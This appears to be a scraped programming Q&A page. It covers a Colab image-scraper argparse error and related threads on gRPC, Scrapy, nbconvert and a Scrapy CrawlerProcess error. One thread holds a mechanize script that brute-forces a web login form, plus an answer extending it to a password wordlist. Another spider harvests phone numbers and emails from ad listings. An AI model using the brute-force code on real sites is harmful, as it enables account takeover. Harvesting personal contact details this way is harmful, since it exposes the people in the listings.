Make parcer at colab for learning images - google-colaboratory

i hope to make parcer at colab but somethig wrong
here is my code
from google.colab import drive
drive.mount('/content/gdrive/')
from urllib.request import urlopen
import argparse
import requests as req
from bs4 import BeautifulSoup
root_dir = "/content/gdrive/My Drive/img/"
parser = argparse.ArgumentParser(description='input.')
parser.add_argument("-name", "--people", required=True)
args = parser.parse_args()
people = args.people
def main():
url_info = "https://www.google.co.kr/search?"
params = {
"q" : people,
"tbm":"isch"
}
html_object = req.get(url_info,params)
if html_object.status_code == 200:
bs_object = BeautifulSoup(html_object.text,"html.parser")
root_dir = bs_object.find_all("img")
for i in enumerate(root_dir[1:]):
t = urlopen(i[1].attrs['src']).read()
filename = "byeongwoo_"+str(i[0]+1)+'.jpg'
with open(filename,"wb") as f:
f.write(t)
print("Img Save Success")
if __name__=="__main__":
main()
and this is error message
usage: ipykernel_launcher.py [-h] -name PEOPLE
ipykernel_launcher.py: error: the following arguments are required: -name/--people
An exception has occurred, use %tb to see the full traceback.
SystemExit: 2
/usr/local/lib/python3.6/dist-packages/IPython/core/interactiveshell.py:2890: UserWarning: To exit: use 'exit', 'quit', or Ctrl-D.
warn("To exit: use 'exit', 'quit', or Ctrl-D.", stacklevel=1)

Related

TensorFlow Serving + gRPC "Did not read entire message"

I'm trying to call my TensorFlow model which is deployed on a cloud foundry server with an Python 2.7 API using TensorFlow Serving and gRPC. The model expects a 200 dim vector as input, which I hardcoded at the moment. The connection Variables are stored in a virtualenv and checked twice.
The code:
import os
from grpc.beta import implementations
import tensorflow as tf
from tensorflow_serving.apis import predict_pb2
from tensorflow_serving.apis import prediction_service_pb2
from grpc._cython import cygrpc
MODEL_NAME = str(os.getenv('MODEL_NAME', ''))
MODEL_SERVER_HOST = str(os.getenv('MODEL_SERVER_HOST', ''))
MODEL_SERVER_PORT = int(os.getenv('MODEL_SERVER_PORT', ''))
ROOT_CERT = str(os.getenv('ROOT_CERT', '')).replace('\\n', '\n')
def metadata_transformer(metadata):
additions = []
token = 'Bearer <my access token>'
additions.append(('authorization', token))
return tuple(metadata) + tuple(additions)
credentials = implementations.ssl_channel_credentials(root_certificates=ROOT_CERT)
channel = implementations.secure_channel(MODEL_SERVER_HOST, MODEL_SERVER_PORT, credentials)
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel, metadata_transformer=metadata_transformer)
import numpy as np
data = np.matrix([0.06222425773739815, 0.08211926370859146, -0.060986146330833435, 0.13920938968658447, 0.10515272617340088, -0.06220443174242973, -0.05927170068025589, -0.054189786314964294, -0.0986655130982399, 0.013334010727703571, -0.05667420104146004, 0.059366412460803986, -0.03483295068144798, -0.05382293462753296, 0.02721281163394451, -0.1428503543138504, 0.029297124594449997, 0.07006879895925522, 0.06501731276512146, 0.028620243072509766, 0.07128454744815826, 0.029960375279188156, 0.0710490494966507, -0.04619687795639038, -0.03106304071843624, -0.04266272485256195, 0.004348727408796549, 0.03099834732711315, 0.09248803555965424, -0.036939311772584915, 0.00017547572497278452, 0.03521900251507759, 0.10932505130767822, -0.019729139283299446, 0.12315405160188675, 0.10092845559120178, -0.12633951008319855, -0.022320391610264778, 0.0870826318860054, -0.06696301698684692, -0.016253307461738586, -0.0413096621632576, -0.040929097682237625, 0.09338817000389099, -0.08800378441810608, 0.015543102286756039, 0.018787918612360954, 0.07351260632276535, 0.038140904158353806, 0.019255049526691437, 0.0875692293047905, -0.07542476058006287, -0.04116508364677429, 0.04507743567228317, -0.06986603885889053, -0.24688798189163208, -0.035459864884614944, 0.06200174242258072, -0.06932217627763748, 0.06320516765117645, -0.023999478667974472, -0.04712359234690666, 0.03672196343541145, -0.02999514900147915, 0.04105519875884056, 0.08891177922487259, 0.15175248682498932, -0.0021488466300070286, 0.04398706927895546, -0.04429445043206215, 0.04708605632185936, 0.043234940618276596, -0.043555982410907745, 0.017381751909852028, 0.048889972269535065, -0.016929129138588905, 0.01731136068701744, -0.04694319888949394, 0.20381565392017365, 0.009074307978153229, 0.004490611143410206, -0.08525945991277695, -0.03385556861758232, 0.017475442960858345, -0.040392760187387466, 0.14970248937606812, 0.042721331119537354, -0.1257765144109726, -0.07097769528627396, -0.10943038016557693, 0.015442096628248692, -0.06519876420497894, -0.07588690519332886, -0.07620779424905777, 0.04572996124625206, -0.058589719235897064, -0.04492143541574478, -0.01922304928302765, -0.008066931739449501, 0.04317406192421913, 0.020763304084539413, -0.025430725887417793, 0.04271349683403969, 0.07393930852413177, 0.0020402593072503805, 0.0783640518784523, 0.047386448830366135, 0.010610940866172314, 0.022059153765439987, 0.034980181604623795, -0.006882485933601856, -0.08911270648241043, -0.001243607490323484, -0.06307544559240341, -0.01352659147232771, -0.24622271955013275, 0.07930449396371841, 0.03659113869071007, -0.05077377334237099, 0.08726480603218079, -0.09274136275053024, -0.05766649544239044, -0.12269984930753708, 0.056026071310043335, -0.0048304214142262936, -0.05568183213472366, -0.08890420943498611, -0.02911136858165264, -0.0944124087691307, 0.0011820291401818395, -0.08908636122941971, -0.008728212676942348, -0.014545259065926075, -0.008866528049111366, 0.02728298306465149, -0.020994992926716805, 0.031155599281191826, 0.036098793148994446, 0.06911332905292511, -0.06691643595695496, -0.00014896543871145695, -0.007080242037773132, 0.0031992685981094837, 0.043563224375247955, 0.02550852671265602, -0.015397937037050724, 0.06041031703352928, -0.08981014788150787, -0.10881254076957703, 0.03226703032851219, -0.02039985917508602, -0.05354547128081322, -0.026514282450079918, 0.09616094827651978, -0.04160488396883011, -0.06793050467967987, -0.17060619592666626, -0.08044841140508652, 0.042605575174093246, 0.08186516910791397, 0.026051705703139305, 0.1254323273897171, 0.09807661175727844, 0.04692094400525093, 0.05536479875445366, 0.004592049401253462, 0.01953544095158577, -0.02827763929963112, 0.11051501333713531, -0.05077047273516655, -0.09987067431211472, 0.025186538696289062, -0.24119670689105988, -0.054666098207235336, 0.03561021387577057, -0.006030901800841093, 0.14740994572639465, 0.09515859931707382, 0.0628485381603241, 0.020558597519993782, -0.04458167776465416, -0.04740617796778679, 0.024550801143050194, -0.09533495455980301, 0.057229768484830856, -0.08855120837688446, 0.027864644303917885, -0.07248448580503464, 0.0647491067647934, 0.09660986065864563, 0.038834456354379654, -0.030274877324700356, -0.024261653423309326, 0.05457066744565964, -0.00860705878585577, 0.04901411384344101, 0.017157232388854027, -0.02722001262009144, 0.012187148444354534, 0.05596058815717697])
request = predict_pb2.PredictRequest()
request.model_spec.name = MODEL_NAME
request.model_spec.signature_name = 'ticketCatFeature2'
request.inputs['input'].CopyFrom(
tf.contrib.util.make_tensor_proto(data, shape=[200]))
print stub.Classify(request, 10)
I'm getting following error message when running the app:
Traceback (most recent call last):
File "app.py", line 36, in
print stub.Classify(request, 10)
File "/home/vagrant/Desktop/Masterarbeit/appDir/venv/local/lib/python2.7/site-packages/grpc/beta/_client_adaptations.py", line 309, in call
self._request_serializer, self._response_deserializer)
File "/home/vagrant/Desktop/Masterarbeit/appDir/venv/local/lib/python2.7/site-packages/grpc/beta/_client_adaptations.py", line 195, in _blocking_unary_unary
raise _abortion_error(rpc_error_call)
grpc.framework.interfaces.face.face.AbortionError: AbortionError(code=StatusCode.INTERNAL, details="Did not read entire message")
Log of grpc Debug: https://ufile.io/owk76

How scrapy crawl work:which class instanced and which method called?

Here is a simple python file--test.py.
import math
class myClass():
def myFun(self,x):
return(math.sqrt(x))
if __name__ == "__main__":
myInstance=myClass()
print(myInstance.myFun(9))
It print 3 with python test.py,let's analyse the running process.
1. to instance myClass and assign it to myInstance.
2.to call myFun function and print the result.
It is scrapy's turn.
In the scrapy1.4 manual,quotes_spider.py is as below.
import scrapy
class QuotesSpider(scrapy.Spider):
name = "quotes"
def start_requests(self):
urls = [
'http://quotes.toscrape.com/page/1/',
'http://quotes.toscrape.com/page/2/',
]
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
def parse(self, response):
page = response.url.split("/")[-2]
filename = 'quotes-%s.html' % page
with open(filename, 'wb') as f:
f.write(response.body)
self.log('Saved file %s' % filename)
To run the spider with scrapy crawl quotes,i am puzzled:
1.Where is the main function or main body for the spider?
2.Which class was instanced?
3.Which method was called?
mySpider = QuotesSpider(scrapy.Spider)
mySpider.parse(response)
How scrapy crawl work exactly?
So let's start. Assuming you use linux/mac. Let's check where us scrapy
$ which scrapy
/Users/tarun.lalwani/.virtualenvs/myproject/bin/scrapy
Let's look at the content of this file
$ cat /Users/tarun.lalwani/.virtualenvs/myproject/bin/scrapy
#!/Users/tarun.lalwani/.virtualenvs/myproject/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from scrapy.cmdline import execute
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(execute())
So this executes execute method from cmdline.py and her is your main method.
cmdline.py
from __future__ import print_function
....
....
def execute(argv=None, settings=None):
if argv is None:
argv = sys.argv
# --- backwards compatibility for scrapy.conf.settings singleton ---
if settings is None and 'scrapy.conf' in sys.modules:
from scrapy import conf
if hasattr(conf, 'settings'):
settings = conf.settings
# ------------------------------------------------------------------
if settings is None:
settings = get_project_settings()
# set EDITOR from environment if available
try:
editor = os.environ['EDITOR']
except KeyError: pass
else:
settings['EDITOR'] = editor
check_deprecated_settings(settings)
# --- backwards compatibility for scrapy.conf.settings singleton ---
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
with warnings.catch_warnings():
warnings.simplefilter("ignore", ScrapyDeprecationWarning)
from scrapy import conf
conf.settings = settings
# ------------------------------------------------------------------
inproject = inside_project()
cmds = _get_commands_dict(settings, inproject)
cmdname = _pop_command_name(argv)
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), \
conflict_handler='resolve')
if not cmdname:
_print_commands(settings, inproject)
sys.exit(0)
elif cmdname not in cmds:
_print_unknown_command(settings, cmdname, inproject)
sys.exit(2)
cmd = cmds[cmdname]
parser.usage = "scrapy %s %s" % (cmdname, cmd.syntax())
parser.description = cmd.long_desc()
settings.setdict(cmd.default_settings, priority='command')
cmd.settings = settings
cmd.add_options(parser)
opts, args = parser.parse_args(args=argv[1:])
_run_print_help(parser, cmd.process_options, args, opts)
cmd.crawler_process = CrawlerProcess(settings)
_run_print_help(parser, _run_command, cmd, args, opts)
sys.exit(cmd.exitcode)
if __name__ == '__main__':
execute()
Now if you notice execute method it processes the arguments passed by you. which is crawl quotes in your case. The execute methods scans the projects for classes and check which has name defined as quotes. It creates the CrawlerProcess class and that runs the whole show.
Scrapy is based on Twisted Python Framework. Which is a scheduler based framework.
Consider the below part of the code
for url in urls:
yield scrapy.Request(url=url, callback=self.parse)
When the engine executes this function and first yield is execute. The value is returned to the engined. The engine now looks at other task that are pending executes them, (when they yield, some other pending task queue function gets a chance). So yield is what allows to break a function execution into parts and help Scrapy/Twisted work.
You can get a detailed overview on the link below
https://doc.scrapy.org/en/latest/topics/architecture.html

minimal example of how to export a jupyter notebook to pdf using nbconvert and PDFExporter()

I am trying to export a pdf copy of a jupyter notebook using nbconvert from within a notebook cell. I have read the documentation, but I just cannot find some basic code to actually execute the nbconvert command and export to pdf.
I was able to get this far, but I was hoping that someone could just fill in the final gaps.
from nbconvert import PDFExporter
notebook_pdf = PDFExporter()
notebook_pdf.template_file = '../print_script/pdf_nocode.tplx'
Note sure how to get from here to actually getting the pdf created.
Any help would be appreciated.
I'm no expert, but managed to get this working. The key is that you need to preprocess the notebook which will allow you to use the PDFExporter.from_notebook_node() function. This will give you your pdf_data in byte format that can then be written to file:
import nbformat
from nbconvert.preprocessors import ExecutePreprocessor
from nbconvert import PDFExporter
notebook_filename = "notebook.ipynb"
with open(notebook_filename) as f:
nb = nbformat.read(f, as_version=4)
ep = ExecutePreprocessor(timeout=600, kernel_name='python3')
ep.preprocess(nb, {'metadata': {'path': 'notebooks/'}})
pdf_exporter = PDFExporter()
pdf_data, resources = pdf_exporter.from_notebook_node(nb)
with open("notebook.pdf", "wb") as f:
f.write(pdf_data)
f.close()
It's worth noting that the ExecutePreprocessor requires the resources dict, but we don't use it in this example.
Following is rest api that convert .ipynb file into .html
POST: http://URL/export/<id>
Get: http://URL/export/<id> will return a id.html
import os
from flask import Flask, render_template, make_response
from flask_cors import CORS
from flask_restful import reqparse, abort, Api, Resource
from nbconvert.exporters import HTMLExporter
exporter = HTMLExporter()
app = Flask(__name__)
cors = CORS(app, resources={r"/export/*": {"origins": "*"}})
api = Api(app)
parser = reqparse.RequestParser()
parser.add_argument('path')
notebook_file_srv = '/path of your .ipynb file'
def notebook_doesnt_exist(nb):
abort(404, message="Notebook {} doesn't exist".format(nb))
class Notebook(Resource):
def get(self, id):
headers = {'Content-Type': 'text/html'}
return make_response(render_template(id + '.html'), 200, headers)
def post(self, id):
args = parser.parse_args()
notebook_file = args['path']
notebook_file = notebook_file_srv + id + '.ipynb'
if not os.path.exists(notebook_file):
return 'notebook \'.ipynb\' file not found', 404
else:
nb_name, _ = os.path.splitext(os.path.basename(notebook_file))
# dirname = os.path.dirname(notebook_file)
output_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'templates')
output_path = os.path.join(output_path, '{}.html'.format(nb_name))
output, resources = exporter.from_filename(notebook_file)
f = open(output_path, 'wb')
f.write(output.encode('utf8'))
f.close()
return 'done', 201
api.add_resource(Notebook, '/export/<id>')
if __name__ == '__main__':
app.run(debug=True)

How to load passwords from a wordlist for web-form login?

I have this Python script that bruteforces a web-form (login) using itertools.
How would I replace the bruteforce/dictionary generation process with a load-passwords-from-wordlist.txt feature?
My code:
#!/usr/bin/python
import mechanize
import itertools
br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
combos = itertools.permutations("a-zA-Z",5)
r = br.open("http://example.com/login")
for x in combos:
br.select_form(nr = 0)
br.form['username'] = "my_username_123"
br.form['password'] = ''.join(x)
print "Checking ",br.form['password']
response = br.submit()
if response.geturl()!="http://example.com/login":
print "Correct password is ",''.join(x)
break
Something like this could be added so if a password file is present in the command line arguments it will use that instead of the pre-defined list.
Example: python script.py password.txt
import sys
import os
if len(sys.argv) > 1:
if os.path.exists(sys.argv[1]):
combos = [line.strip() for line in open(sys.argv[1])]
else:
print "[-] File not found"
sys.exit(0)
else:
combos = itertools.permutations("a-zA-Z",5)

Why does my CrawlerProcess not have the function "crawl"?

import scrapy
from scrapy.crawler import CrawlerProcess
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors import LinkExtractor
from items import BackpageItem, CityvibeItem
from scrapy.shell import inspect_response
import re
import time
import sys
class MySpider(CrawlSpider):
name = 'example'
allowed_domains = ['www.example.com']
# Set last_age to decide how many pages are crawled
last_page = 10
start_urls = ['http://www.example.com/washington/?page=%s' % page for page in xrange(1,last_page)]
rules = (
#Follow all links inside <div class="cat"> and calls parse_item on each link
Rule(LinkExtractor(
restrict_xpaths=('//a[#name="listing_link"]')),
callback='parse_item'),
)
# Extract relevent text from the website into a ExampleItem
def parse_item(self, response):
item = ExampleItem()
item['title'] = response.xpath('string(//h2[#class="post-title"]/text())').extract()
item['desc'] = response.xpath('string(//div[#class="section post-body"]/text())').extract()
item['url'] = response.url
item['location'] = response.xpath('string(//div[#class="posting"]/div[2]/text())').extract()
item['posted_date'] = response.xpath('string(//div[#class="post-date"]/span/text())').extract()#.re("(?<=Posted\s*).*")
item['crawled_date'] = time.strftime("%c")
# not sure how to get the other image urls right now
item['image_urls'] = response.xpath('string(//div[#class="section post-contact-container"]/div/div/img/#src)').extract()
# I can't find this section on any pages right now
item['other_ad_urls'] = response.xpath('//a[#name="listing_link"]/#href').extract()
item['phone_number'] = "".join(response.xpath('//div[#class="post-info"]/span[contains(text(), "Phone")]/following-sibling::a/text()').extract())
item['email'] = "".join(response.xpath('//div[#class="post-info"]/span[contains(text(), "Email")]/following-sibling::a/text()').extract())
item['website'] = "".join(response.xpath('//div[#class="post-info limit"]/span[contains(text(), "Website")]/following-sibling::a/text()').extract())
item['name'] = response.xpath('//div[#class="post-name"]/text()').extract()
#uncomment for debugging
#inspect_response(response, self)
return item
# process1 = CrawlerProcess({
# 'ITEM_PIPELINES': {
# #'scrapy.contrib.pipeline.images.ImagesPipeline': 1
# 'backpage.pipelines.GeolocationPipeline': 4,
# 'backpage.pipelines.LocationExtractionPipeline': 3,
# 'backpage.pipelines.BackpagePipeline': 5
# }
# });
process1 = CrawlerProcess({
'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
})
process1.crawl(MySpider)
process1.start()
My spider works perfectly when I run it from the command line with
scrapy crawl example
but I will need to run multiple spiders, so I want to put them all in a script and use CrawlerProcess. When I try to run this I get the error,
AttributeError: 'CrawlerProcess' object has no attribute 'crawl'
This is scrapy version 0.24.6.
All items and pipelines are correct, because the spider works from the command line.
There is (was?) a compatibility problem between Scrapy and Scrapyd. I needed to run Scrapy 0.24 and Scrapyd 1.0.1.
Here is the issue on Github
https://github.com/scrapy/scrapyd/issues/100#issuecomment-115268880